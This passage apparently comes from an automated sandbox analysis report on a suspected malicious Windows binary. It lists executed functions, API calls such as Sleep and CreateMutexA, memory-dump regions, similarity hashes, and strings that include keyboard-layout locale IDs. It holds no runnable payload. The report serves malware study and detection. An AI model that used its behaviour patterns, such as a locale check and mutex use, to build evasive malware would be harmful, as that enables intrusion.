fcbb9c 12282->12283 12284 fccf6b _xtime_get GetSystemTimePreciseAsFileTime 12283->12284 12287 fcbba4 __Xtime_diff_to_millis2 __floor_pentium4 12283->12287 12285 fcbbcf __Xtime_diff_to_millis2 12284->12285 12286 fccf6b _xtime_get GetSystemTimePreciseAsFileTime 12285->12286 12285->12287 12286->12287 12287->12281 12682 fb9f44 12684 fb9f4c shared_ptr 12682->12684 12683 fba953 Sleep CreateMutexA 12685 fba98e 12683->12685 12684->12683 12686 fba01f shared_ptr 12684->12686

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 00FE652B Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ExitProcess.KERNEL32(?,?,00FE652A,?,?,?,?,?,00FE7661), ref: 00FE6567
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                    • Opcode ID: de434d7692f0a752ab3dc6fe02151bc2cfcc2042e9e8b6ca9bdd85be1d7adcee
                                                                                                                                                                    • Instruction ID: 67bec75724c296bacad797f4cbb2f9c43c3a16b7fe8fc9520a484941dfb89b3c
                                                                                                                                                                    • Opcode Fuzzy Hash: de434d7692f0a752ab3dc6fe02151bc2cfcc2042e9e8b6ca9bdd85be1d7adcee
                                                                                                                                                                    • Instruction Fuzzy Hash: E5E0863020038CAECE257F15DC5DE8E3B29EB217E1F041800FD0486121CB25ED52D540
                                                                                                                                                                    Function 05090C6E Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2176387968.0000000005090000.00000040.00001000.00020000.00000000.sdmp, Offset: 05090000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_5090000_file.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 4b5fbaf4e6b11a44e56594718493f6bb583b983eb816c8ba6e10a4a6c02029fb
                                                                                                                                                                    • Instruction ID: 610036e68dea1c09cd1b817097ba06ad676fe529c2cbd6eecfd379d25c90a086
                                                                                                                                                                    • Opcode Fuzzy Hash: 4b5fbaf4e6b11a44e56594718493f6bb583b983eb816c8ba6e10a4a6c02029fb
                                                                                                                                                                    • Instruction Fuzzy Hash: 511179EF20E524BE7959C1827B3CABE666FE5C2730731842BF807C510AD2944E5A31B1
                                                                                                                                                                    Function 00FB5C10 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                                                                                                                                                    • API String ID: 0-3963862150
                                                                                                                                                                    • Opcode ID: 3c558b0d51cfae923713eea845b21d9cca76874b6df8f7daef0778f6e98cf434
                                                                                                                                                                    • Instruction ID: f4a50fba6d494a330bc21a15a06f0d77ce4eade0e2526c73709bdb4792c1f3c5
                                                                                                                                                                    • Opcode Fuzzy Hash: 3c558b0d51cfae923713eea845b21d9cca76874b6df8f7daef0778f6e98cf434
                                                                                                                                                                    • Instruction Fuzzy Hash: 85F1D070A0024C9BEB24DF64CD85BDEBBB9EF44700F5042A9F508E7281DB799A84DF91
                                                                                                                                                                    Function 00FB9BA5 Relevance: 3.1, APIs: 2, Instructions: 140sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 185 fb9ba5-fb9d91 call fc7a00 call fb5c10 call fb8b30 call fc8220
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00FBA963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                    • Opcode ID: a49b168f4f076d7db3336de749fe90185fe7dd2faca1dff6b8a02335bf68cc33
                                                                                                                                                                    • Instruction ID: c4a85eac902a771e4e5c73ca842ec22a91ed9d8e940e3be6143d238dab67a366
                                                                                                                                                                    • Opcode Fuzzy Hash: a49b168f4f076d7db3336de749fe90185fe7dd2faca1dff6b8a02335bf68cc33
                                                                                                                                                                    • Instruction Fuzzy Hash: 93315D71B042019BEB08EB79DD89BEDBB62EFC1320F248219E414D73D5C7794981EB51
                                                                                                                                                                    Function 00FB9F44 Relevance: 3.1, APIs: 2, Instructions: 137sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 207 fb9f44-fb9f64 211 fb9f92-fb9fae 207->211 212 fb9f66-fb9f72 207->212 215 fb9fdc-fb9ffb 211->215 216 fb9fb0-fb9fbc 211->216 213 fb9f88-fb9f8f call fcd663 212->213 214 fb9f74-fb9f82 212->214 213->211 214->213 219 fba92b 214->219 217 fba029-fba916 call fc80c0 215->217 218 fb9ffd-fba009 215->218 221 fb9fbe-fb9fcc 216->221 222 fb9fd2-fb9fd9 call fcd663 216->222 223 fba00b-fba019 218->223 224 fba01f-fba026 call fcd663 218->224 226 fba953-fba994 Sleep CreateMutexA 219->226 227 fba92b call fe6c6a 219->227 221->219 221->222 222->215 223->219 223->224 224->217 236 fba9a7-fba9a8 226->236 237 fba996-fba998 226->237 227->226 237->236 239 fba99a-fba9a5 237->239 239->236
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00FBA963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
